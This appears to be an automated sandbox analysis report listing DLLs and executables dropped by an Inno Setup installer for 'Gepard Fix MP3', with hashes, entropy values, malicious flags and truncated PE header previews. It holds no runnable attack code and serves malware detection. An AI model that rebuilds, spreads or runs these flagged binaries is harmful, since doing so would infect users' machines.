                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........w......#.....T...................p.....a.......................................... ......................0.......@.......p..@.......................T............................`......................8B...............................text....R.......T..................`.P`.data........p.......X..............@.`..rdata...F.......H...\..............@.`@/4......L3.......4..................@.0@.bss....@.............................`..edata.......0......................@.0@.idata.......@......................@.0..CRT....,....P......................@.0..tls.... ....`......................@.0..rsrc...@....p......................@.0..reloc..T...........................@.0B........................................................................................................................................................................................
                                                          Process:C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmp
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):509934
                                                          Entropy (8bit):6.031080686301204
                                                          Encrypted:false
                                                          SSDEEP:6144:wx/Eqtn5oeHkJstujMWYVgUr/MSK/zwazshLKl11PC5qLJy1Pkfsm:M/NDXEJIPVgUrgbzslW11UqLJokfsm
                                                          MD5:02E6C6AB886700E6F184EEE43157C066
                                                          SHA1:E796B7F7762BE9B90948EB80D0138C4598700ED9
                                                          SHA-256:EA53A198AA646BED0B39B40B415602F8C6DC324C23E1B9FBDCF7B416C2C2947D
                                                          SHA-512:E72BC0A2E9C20265F1471C30A055617CA34DA304D7932E846D5D6999A8EBCC0C3691FC022733EAEB74A25C3A6D3F347D3335B902F170220CFE1DE0340942B596
                                                          Malicious:true
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........P......#...............................k......................... ......CY........ .....................................................................................................................|...,............................text...T...........................`.P`.data...............................@.0..rdata..XN.......P..................@.`@/4.......x...0...z..................@.0@.bss..................................`..edata..............................@.0@.idata..............................@.0..CRT....,...........................@.0..tls.... ...........................@.0..reloc..............................@.0B................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmp
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):397808
                                                          Entropy (8bit):6.396146399966879
                                                          Encrypted:false
                                                          SSDEEP:6144:q6WhfTNgMVVPwCxpk76CcIAg8TQfn9l1bBE3A97vupNBXH:q60TvSGpk7eIAg489l1S3A97vkVH
                                                          MD5:E0747D2E573E0A05A7421C5D9B9D63CC
                                                          SHA1:C45FC383F9400F8BBE0CA8E6A7693AA0831C1DA7
                                                          SHA-256:25252B18CE0D80B360A6DE95C8B31E32EFD8034199F65BF01E3612BD94ABC63E
                                                          SHA-512:201EE6B2FD8DCD2CC873726D56FD84132A4D8A7434B581ABD35096A5DE377009EC8BC9FEA2CC223317BBD0D971FB1E61610509E90B76544BDFF069E0D6929AED
                                                          Malicious:true
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...\4......n......#......................... ....Dk.......................................... ..........................5...0...............................`..T............................P.......................2...............................text...D...........................`.P`.data...X1... ...2..................@.`..rdata..x....`.......F..............@.`@/4..................................@.0@.bss....`.............................`..edata...5.......6..................@.0@.idata.......0......................@.0..CRT....,....@......................@.0..tls.... ....P......................@.0..reloc..T....`......................@.0B................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmp
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):171848
                                                          Entropy (8bit):6.579154579239999
                                                          Encrypted:false
                                                          SSDEEP:3072:LrhG5+L/AcY680k2SxVqetJP5Im+A9mNoWqlM5ywwoS:LV6+LA0G0enP5PFYOWi6w1
                                                          MD5:236A679AB1B16E66625AFBA86A4669EB
                                                          SHA1:73AE354886AB2609FFA83429E74D8D9F34BD45F2
                                                          SHA-256:B1EC758B6EDD3E5B771938F1FEBAC23026E6DA2C888321032D404805E2B05500
                                                          SHA-512:C19FA027E2616AC6B4C18E04959DFE081EF92F49A11260BA69AFE10313862E8FEFF207B9373A491649928B1257CF9B905F24F073D11D71DCD29B0F9ADAC80248
                                                          Malicious:false
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.... ......;......#...............................c................................q......... .........................,.......<.......H...........................................................................(................................text...............................`.P`.data... ...........................@.0..rdata..|y.......z..................@.`@/4......HN...@...P... ..............@.0@.bss..................................`..edata..,............p..............@.0@.idata..<............~..............@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc...H...........................@.0..reloc..............................@.0B........................................................................................................................................................................................
                                                          Process:C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmp
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):259014
                                                          Entropy (8bit):6.075222655669795
                                                          Encrypted:false
                                                          SSDEEP:3072:O4WGkOMuCsxvlBUlthMP3SyyqX3/yfGG7ca/RM3yH8Tw/yr+Jg8jGCzftns9/1tA:tWGkOME304A7ca/RNyN8jGCzftngvA
                                                          MD5:B4FDE05A19346072C713BE2926AF8961
                                                          SHA1:102562DE2240042B654C464F1F22290676CB6E0F
                                                          SHA-256:513CEC3CCBE4E0B31542C870793CCBDC79725718915DB0129AA39035202B7F97
                                                          SHA-512:9F3AEE3EBF04837CEEF08938795DE0A044BA6602AACB98DA0E038A163119C695D9CC2CA413BD709196BFD3C800112ABABC3AF9E2E9A0C77D88BD4A1C88C2ED27
                                                          Malicious:true
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#..............................xe.........................@.......{........ .........................+;......L.......0.................... ..8...................................................h................................text...............................`.P`.data...$...........................@.0..rdata.../.......0..................@.`@/4.......l.......n..................@.0@.bss....,.............................`..edata..+;.......<...d..............@.0@.idata..L...........................@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc...0...........................@.0..reloc..8.... ......................@.0B........................................................................................................................................................................................
                                                          Process:C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmp
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):64724
                                                          Entropy (8bit):5.910307743399971
                                                          Encrypted:false
                                                          SSDEEP:768:U84Oo2LbVtfNsqnYPL7cZ690d+yCG7QiZggD0Spo3YfklbTRPmK0Lz:Uf2LbVtfDGLr2xk4DU3YfkhTRuKW
                                                          MD5:7AF455ADEA234DEA33B2A65B715BF683
                                                          SHA1:F9311CB03DCF50657D160D89C66998B9BB1F40BA
                                                          SHA-256:6850E211D09E850EE2510F6EAB48D16E0458BCE35916B6D2D4EB925670465778
                                                          SHA-512:B8AC3E2766BB02EC37A61218FAF60D1C533C0552B272AF6B41713C17AB69C3731FA28F3B5D73766C5C59794D5A38CC46836FD93255DF38F7A3ABD219D51BB41A
                                                          Malicious:true
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....h........................lm.........................P................ .................................."...0..`....................@............................... .......................................................text...dg.......h..................`.P`.data...0............l..............@.0..rdata...............n..............@.@@/4......\............z..............@.0@.bss....,.............................`..edata..............................@.0@.idata...".......$..................@.0..CRT....,...........................@.0..tls.... .... ......................@.0..rsrc...`....0......................@.0..reloc.......@......................@.0B........................................................................................................................................................................................
                                                          Process:C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmp
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):92019
                                                          Entropy (8bit):5.974787373427489
                                                          Encrypted:false
                                                          SSDEEP:1536:+j80nVGEhJyBnvQXUDkUPoWCSgZosDGMsZLXWU9+HN4yoRtJJ:C8IgtyUDkBWIZosDGDBXWPHN4yoRtJJ
                                                          MD5:CC7DAD980DD04E0387795741D809CBF7
                                                          SHA1:A49178A17B1C72AD71558606647F5011E0AA444B
                                                          SHA-256:0BAE9700E29E4E7C532996ADF6CD9ADE818F8287C455E16CF2998BB0D02C054B
                                                          SHA-512:E4441D222D7859169269CA37E491C37DAA6B3CDD5F4A05A0A246F21FA886F5476092E64DFF88890396EF846B9E8D2880E33F1F594CD61F09023B3EF4CD573EA3
                                                          Malicious:true
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...(....0..7......#.........,.....................m................................B......... ...................... .......0...*...........................................................p......................t5...............................text..............................`.P`.data... ...........................@.0..rdata..............................@.`@/4.......(.......*..................@.0@.bss..................................`..edata....... ......................@.0@.idata...*...0...,..................@.0..CRT....,....`....... ..............@.0..tls.... ....p......."..............@.0..rsrc................$..............@.0..reloc...............(..............@.0B........................................................................................................................................................................................
                                                          Process:C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmp
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):165739
                                                          Entropy (8bit):6.062324507479428
                                                          Encrypted:false
                                                          SSDEEP:3072:wqozCom32MhGf+cPlDQ6jGQGExqLsGXnru+5FMCp:wqxo4LGlDQ6yQGsqLsGXruSFMCp
                                                          MD5:E2F18B37BC3D02CDE2E5C15D93E38418
                                                          SHA1:1A6C58F4A50269D3DB8C86D94B508A1919841279
                                                          SHA-256:7E555192331655B04D18F40E8F19805670D56FC645B9C269B9F10BF45A320C97
                                                          SHA-512:61AB4F3475B66B04399111B106C3F0A744DC226A59EB03C134AE9216A9EA0C7F9B3B211148B669C32BAFB05851CC6C18BD69EA431DBC2FE25FE470CB4786FD17
                                                          Malicious:true
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........0.........#.........,.....................n................................&......... .........................y....0...D..................................................................................x7...............................text...............................`.P`.data... ...........................@.0..rdata..............................@.`@/4......Dg.......h..................@.0@.bss....(....p........................`..edata..y............8..............@.0@.idata...D...0...F..................@.0..CRT....,............ ..............@.0..tls.... ............"..............@.0..reloc...............$..............@.0B................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmp
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):101544
                                                          Entropy (8bit):6.237382830377451
                                                          Encrypted:false
                                                          SSDEEP:1536:nrYjG+7rjCKdiZ4axdj+nrlv3ecaQZ93yQNMRP2Ea5JPTxi0C9A046QET:M9eKdiBxUnfb3yZROEYJPTxib9A5ET
                                                          MD5:E13FCD8FB16E483E4DE47A036687D904
                                                          SHA1:A54F56BA6253D4DECAAE3DE8E8AC7607FD5F0AF4
                                                          SHA-256:0AC1C17271D862899B89B52FAA13FC4848DB88864CAE2BF4DC7FB81C5A9A49BF
                                                          SHA-512:38596C730B090B19E34183182273146C3F164211644EBC0A698A83651B2753F7D9B1D6EE477D1798BD7219B5977804355E2F57B1C3013BF3D498BF96DEC9D02E
                                                          Malicious:true
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........d.........#.........`....................Hk.................................$........ ......................`..-....p......................................................................................Lt...............................text...............................`.P`.data...L...........................@.0..rdata..............................@.`@/4.......*... ...,..................@.0@.bss.........P........................`..edata..-....`.......*..............@.0@.idata.......p... ...0..............@.0..CRT....,............P..............@.0..tls.... ............R..............@.0..rsrc................T..............@.0..reloc...............X..............@.0B........................................................................................................................................................................................
                                                          Process:C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmp
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):291245
                                                          Entropy (8bit):6.234245376773595
                                                          Encrypted:false
                                                          SSDEEP:6144:dg6RpdbWJbnZ9zwvNOmdcm0sn+g2eqZq6eadTD8:UJ99zwvNOmdcm0s+g1qZQadTD8
                                                          MD5:2D8A0BC588118AA2A63EED7BF6DFC8C5
                                                          SHA1:7FB318DC21768CD62C0614D7AD773CCFB7D6C893
                                                          SHA-256:707DEE17E943D474FBE24EF5843A9A37E923E149716CAD0E2693A0CC8466F76E
                                                          SHA-512:A296A8629B1755D349C05687E1B9FAE7ED5DE14F2B05733A7179307706EA6E83F9F9A8729D2B028EDDC7CAF8C8C30D69AD4FEA6EC19C66C945772E7A34F100DE
                                                          Malicious:false
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........h..@......#.........d....................4i................................<......... ......................p..5.......t...................................................................................<................................text...T...........................`.P`.data...0...........................@.0..rdata...v.......x..................@.`@/4...........@......................@.0@.bss.........`........................`..edata..5....p.......6..............@.0@.idata..t............>..............@.0..CRT....,............F..............@.0..tls.... ............H..............@.0..reloc...............J..............@.0B................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmp
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):706136
                                                          Entropy (8bit):6.517672165992715
                                                          Encrypted:false
                                                          SSDEEP:12288:8TCY9iAO+e+693qCfG0l2KDIq4N1i9aqi+:8piAO+e+69ne02KDINN1MaZ+
                                                          MD5:3A8A13F0215CDA541EC58F7C80ED4782
                                                          SHA1:085C3D5F62227319446DD61082919F6BE1EFD162
                                                          SHA-256:A397C9C2B5CAC7D08A2CA720FED9F99ECE72078114FFC86DF5DBC2B53D5FA1AD
                                                          SHA-512:4731D7ABB8DE1B77CB8D3F63E95067CCD7FAFED1FEB508032CB41EE9DB3175C69E5D244EEE8370DE018140D7B1C863A4E7AFBBE58183294A0E7CD98F2A8A0EAD
                                                          Malicious:true
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...t.......Q......#..............................Pe......................... ................ .........................A.......L............................... ,......................................................,............................text...8...........................`.P`.data...............................@.P..rdata..............................@.`@/4......\............x..............@.0@.bss..................................`..edata..A........ ...^..............@.0@.idata..L............~..............@.0..CRT....,...........................@.0..tls.... ...........................@.0..reloc.. ,..........................@.0B................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmp
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):248781
                                                          Entropy (8bit):6.474165596279956
                                                          Encrypted:false
                                                          SSDEEP:3072:oW4uzRci3pB4FvOhUHN1Dmfk46sR6/9+B7Bt9Z42fTSCi3QUqbQrPeL8rFErGfju:n4uB4FvHNElE9+B7Bj6GTSCiZPNVS
                                                          MD5:C4002F9E4234DFB5DBE64C8D2C9C2F09
                                                          SHA1:5C1DCCE276FDF06E6AA1F6AD4D4B49743961D62D
                                                          SHA-256:F5BC251E51206592B56C3BD1BC4C030E2A98240684263FA766403EA687B1F664
                                                          SHA-512:4F7BC8A431C07181A3D779F229E721958043129BBAEC65A538F2DD6A2CAB8B4D6165B4149B1DF56B31EB062614363A377E1982FD2F142E49DA524C1C96FC862E
                                                          Malicious:false
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........]......#...............................h......................... .......!........ .........................A.......\.......................................................................................\............................text..............................`.P`.data...T...........................@.0..rdata..P[.......\..................@.`@/4.......v...0...v..................@.0@.bss..................................`..edata..A........ ..................@.0@.idata..\...........................@.0..CRT....,...........................@.0..tls.... ...........................@.0..reloc..............................@.0B................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmp
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):248694
                                                          Entropy (8bit):6.346971642353424
                                                          Encrypted:false
                                                          SSDEEP:6144:MUijoruDtud8kVtHvBcEcEJAbNkhJIXM3rhv:Cy8kTHvBcE1kI3rhv
                                                          MD5:39A15291B9A87AEE42FBC46EC1FE35D6
                                                          SHA1:AADF88BBB156AD3CB1A2122A3D6DC017A7D577C1
                                                          SHA-256:7D4546773CFCC26FEC8149F6A6603976834DC06024EEAC749E46B1A08C1D2CF4
                                                          SHA-512:FF468FD93EFDB22A20590999BC9DD68B7307BD406EB3746C74A3A472033EA665E6E3F778325849DF9B0913FFC7E4700E2BEED4666DA6E713D984E92F9DB5F679
                                                          Malicious:true
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........w......#.....x.........................i.......................................... ......................`..u........1...................................................................................................................text...Tw.......x..................`.P`.data................|..............@.`..rdata..t;.......<...~..............@.`@/4.......f.......h..................@.0@.bss.........P........................`..edata..u....`......."..............@.0@.idata...1.......2...>..............@.0..CRT....,............p..............@.0..tls.... ............r..............@.0..reloc...............t..............@.0B................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmp
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):30994
                                                          Entropy (8bit):5.666281517516177
                                                          Encrypted:false
                                                          SSDEEP:768:SrCNSOFBZVDIxxDsIpx0uZjaYNdJSH6J6:SrCyx0maYNdh6
                                                          MD5:3C033F35FE26BC711C4D68EB7CF0066D
                                                          SHA1:83F1AED76E6F847F6831A1A1C00FEDC50F909B81
                                                          SHA-256:9BA147D15C8D72A99BC639AE173CFF2D22574177242A7E6FE2E9BB09CC3D5982
                                                          SHA-512:7811BE5CCBC27234CE70AB4D6541556612C45FE81D5069BA64448E78953387B1C023AA2A04E5DBF8CAACE7291B8B020BEE2F794FBC190837F213B8D6CB698860
                                                          Malicious:true
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........p..8......#.....*...l...............@.....j.......................................... .........................a.......(...............................x...................................................,................................text...8(.......*..................`.P`.data... ....@......................@.0..rdata.......P.......0..............@.0@/4...........`.......6..............@.0@.bss..................................`..edata..a............L..............@.0@.idata..(............`..............@.0..CRT....,............h..............@.0..tls.... ............j..............@.0..reloc..x............l..............@.0B................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmp
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):448557
                                                          Entropy (8bit):6.353356595345232
                                                          Encrypted:false
                                                          SSDEEP:12288:TC5WwqtP7JRSIOKxQg2FgggggggTggZgoggggggggggggggggggnggDggD7d:TC5WltP7JRSIOKxmeR
                                                          MD5:908111F583B7019D2ED3492435E5092D
                                                          SHA1:8177C5E3B4D5CC1C65108E095D07E0389164DA76
                                                          SHA-256:E8E2467121978653F9B6C69D7637D8BE1D0AC6A4028B672A9B937021AD47603C
                                                          SHA-512:FD35BACAD03CFA8CD1C0FFF2DAC117B07F516E1E37C10352ED67E645F96E31AC499350A2F21702EB51BE83C05CF147D0876DAC34376EEDE676F3C7D4E4A329CB
                                                          Malicious:true
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....,...................@.....i......................... ......._........ .........................[.......X...............................(&...................................................... ............................text...d*.......,..................`.P`.data........@.......0..............@.`..rdata......P.......2..............@.`@/4..................................@.0@.bss....|.............................`..edata..[............j..............@.0@.idata..X...........................@.0..CRT....,...........................@.0..tls.... ...........................@.0..reloc..(&.......(..................@.0B................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmp
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):65181
                                                          Entropy (8bit):6.085572761520829
                                                          Encrypted:false
                                                          SSDEEP:768:1JrcDWlFkbBRAFqDnlLKgprfElH0hiGoeLXRcW/VB6dkhxLemE5ZHvIim3YWATMk:XrTk3iqzlLKgp6H38B6u0Uim3Y15P
                                                          MD5:98A49CC8AE2D608C6E377E95833C569B
                                                          SHA1:BA001D8595AC846D9736A8A7D9161828615C135A
                                                          SHA-256:213B6ADDAB856FEB85DF1A22A75CDB9C010B2E3656322E1319D0DEF3E406531C
                                                          SHA-512:C9D756BB127CAC0A43D58F83D01BFE1AF415864F70C373A933110028E8AB0E83612739F2336B28DC44FAABA6371621770B5BCC108DE7424E31378E2543C40EFC
                                                          Malicious:false
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........[......#...............................d.........................p................ .............................. .......P..P....................`..x............................@.......................!..\............................text...D...........................`.P`.data...D...........................@.0..rdata..l...........................@.0@/4......p/.......0..................@.0@.bss..................................`..edata..............................@.0@.idata....... ......................@.0..CRT....0....0......................@.0..tls.... ....@......................@.0..rsrc...P....P......................@.0..reloc..x....`......................@.0B........................................................................................................................................................................................
                                                          Process:C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmp
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):720373
                                                          Entropy (8bit):6.507168051964802
                                                          Encrypted:false
                                                          SSDEEP:12288:Vhu7eEcdCP8trP837szHUA6JCzS9Ntc3l3ER6orNjURFFDExyFW:nu7eEYCP8trP837szHUA60SLtcV3E9kq
                                                          MD5:4B183248D3659A15CFF9C6C7138BF5AD
                                                          SHA1:72B7DDBE535C44D740DF04D23F59A64F6B8D43EB
                                                          SHA-256:A509810656C218E0E5DA842B3B4DAE55713E166DFA877873577E0F7B087909C0
                                                          SHA-512:B34D33013061B3106F5471120B5614F0004833FE676169927127B00437772D65AA9EFBA98FD8D3606B4E490050BFA80A071E14C039AF7245E5297B59E9E7D2BF
                                                          Malicious:true
                                                          Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................x..........x.............@..............................................@...............................%..................................................................................................................CODE.....w.......x.................. ..`DATA.................|..............@...BSS.....l................................idata...%.......&..................@....tls.....................................rdata..............................@..P.reloc....... ......................@..P.rsrc...............................@..P.....................^..............@..P........................................................................................................................................
                                                          Process:C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmp
                                                          File Type:InnoSetup Log Gepard Fix MP3, version 0x30, 5746 bytes, 138727\user, "C:\Users\user\AppData\Local\Gepard Fix MP3"
                                                          Category:dropped
                                                          Size (bytes):5746
                                                          Entropy (8bit):4.815109301350471
                                                          Encrypted:false
                                                          SSDEEP:48:uygyMdLBo1Fb6pKLZfWfu9x+4bLVO3471sS7anxs9hrMNrI+Op6pNMB/KG0r7Kt0:WhW1d6pK9Wfu9x+eOIhB7X9/0wpJo
                                                          MD5:D44F0EF0601E18479D3F5D4855180256
                                                          SHA1:842E4DF6FB913E3D1BA28A644C5648AE303AA984
                                                          SHA-256:903DF717CF92A513176D477167D92B3396188F8A816DA2A7FF319B62AF659697
                                                          SHA-512:B24E8E97AC9FD4A7335D4AAF33468E220E8D6A368301AFA410D1F12EA911BBCF69E5F7D600244C08B779B75F6BFF278A70782B410637831EA42F0DD8533D2856
                                                          Malicious:false
                                                          Preview:Inno Setup Uninstall Log (b)....................................Gepard Fix MP3..................................................................................................................Gepard Fix MP3..................................................................................................................0..."...r...%................................................................................................................~4..........=.i......Q....138727.user.C:\Users\user\AppData\Local\Gepard Fix MP3...........-...... ............IFPS.............................................................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TPASSWORDEDIT....TPASSWORDEDIT...........................................!MAIN....-1..(...dll:kernel32.dll.CreateFileA..............$...dll:kernel32.dll.WriteFile............"...dll:kernel32.dll.CloseHandle........"...dll:kernel32.dll.ExitProcess........%...dll:User3
                                                          Process:C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmp
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):720373
                                                          Entropy (8bit):6.507168051964802
                                                          Encrypted:false
                                                          SSDEEP:12288:Vhu7eEcdCP8trP837szHUA6JCzS9Ntc3l3ER6orNjURFFDExyFW:nu7eEYCP8trP837szHUA60SLtcV3E9kq
                                                          MD5:4B183248D3659A15CFF9C6C7138BF5AD
                                                          SHA1:72B7DDBE535C44D740DF04D23F59A64F6B8D43EB
                                                          SHA-256:A509810656C218E0E5DA842B3B4DAE55713E166DFA877873577E0F7B087909C0
                                                          SHA-512:B34D33013061B3106F5471120B5614F0004833FE676169927127B00437772D65AA9EFBA98FD8D3606B4E490050BFA80A071E14C039AF7245E5297B59E9E7D2BF
                                                          Malicious:true
                                                          Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................x..........x.............@..............................................@...............................%..................................................................................................................CODE.....w.......x.................. ..`DATA.................|..............@...BSS.....l................................idata...%.......&..................@....tls.....................................rdata..............................@..P.reloc....... ......................@..P.rsrc...............................@..P.....................^..............@..P........................................................................................................................................
                                                          Process:C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmp
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):98626
                                                          Entropy (8bit):6.478068795827396
                                                          Encrypted:false
                                                          SSDEEP:1536:HDuZqv5WNPuWOD+QZ7OWN4oOlatKZ2XGnToIfQIOEIOGxpdo4VoWsj:r9P6WN4wyTBfGqGxpdo4VoB
                                                          MD5:70CA53E8B46464CCF956D157501D367A
                                                          SHA1:AE0356FAE59D9C2042270E157EA0D311A831C86A
                                                          SHA-256:4A7AD2198BAACC14EA2FFD803F560F20AAD59C3688A1F8AF2C8375A0D6CC9CFE
                                                          SHA-512:CB1D52778FE95D7593D1FDBE8A1125CD19134973B65E45F1E7D21A6149A058BA2236F4BA90C1CE01B1B0AFAD4084468D1F399E98C1F0D6F234CBA023FCC7B4AE
                                                          Malicious:false
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....='=.x..=......#.........t.....................c.......................................... .................................8...............................0...................................................0................................text...t...........................`.P`.data... ...........................@.0..rdata...M.......N..................@.`@/4......t&...P...(...4..............@.0@.bss..................................`..edata...............\..............@.0@.idata..8............f..............@.0..CRT....,............n..............@.0..tls.... ............p..............@.0..reloc..0............r..............@.0B................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmp
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):4096
                                                          Entropy (8bit):4.026670007889822
                                                          Encrypted:false
                                                          SSDEEP:48:ivuz1hEU3FR/pmqBl8/QMCBaquEMx5BC+SS4k+bkguj0KHc:bz1eEFNcqBC/Qrex5iSKDkc
                                                          MD5:0EE914C6F0BB93996C75941E1AD629C6
                                                          SHA1:12E2CB05506EE3E82046C41510F39A258A5E5549
                                                          SHA-256:4DC09BAC0613590F1FAC8771D18AF5BE25A1E1CB8FDBF4031AA364F3057E74A2
                                                          SHA-512:A899519E78125C69DC40F7E371310516CF8FAA69E3B3FF747E0DDF461F34E50A9FF331AB53B4D07BB45465039E8EBA2EE4684B3EE56987977AE8C7721751F5F9
                                                          Malicious:true
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................H................|.......|.......|......Rich............PE..L....M;J..................................... ....@..........................@..............................................l ..P....0..@............................................................................ ..D............................text............................... ..`.rdata....... ......................@..@.rsrc...@....0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmp
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):2560
                                                          Entropy (8bit):2.8818118453929262
                                                          Encrypted:false
                                                          SSDEEP:24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
                                                          MD5:A69559718AB506675E907FE49DEB71E9
                                                          SHA1:BC8F404FFDB1960B50C12FF9413C893B56F2E36F
                                                          SHA-256:2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
                                                          SHA-512:E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
                                                          Malicious:true
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\AppData\Local\Temp\is-OJ2JU.tmp\eCh9R4T214.tmp
                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):6144
                                                          Entropy (8bit):4.215994423157539
                                                          Encrypted:false
                                                          SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12pS5SKvkc:sfJEVYlvxaX12EF
                                                          MD5:4FF75F505FDDCC6A9AE62216446205D9
                                                          SHA1:EFE32D504CE72F32E92DCF01AA2752B04D81A342
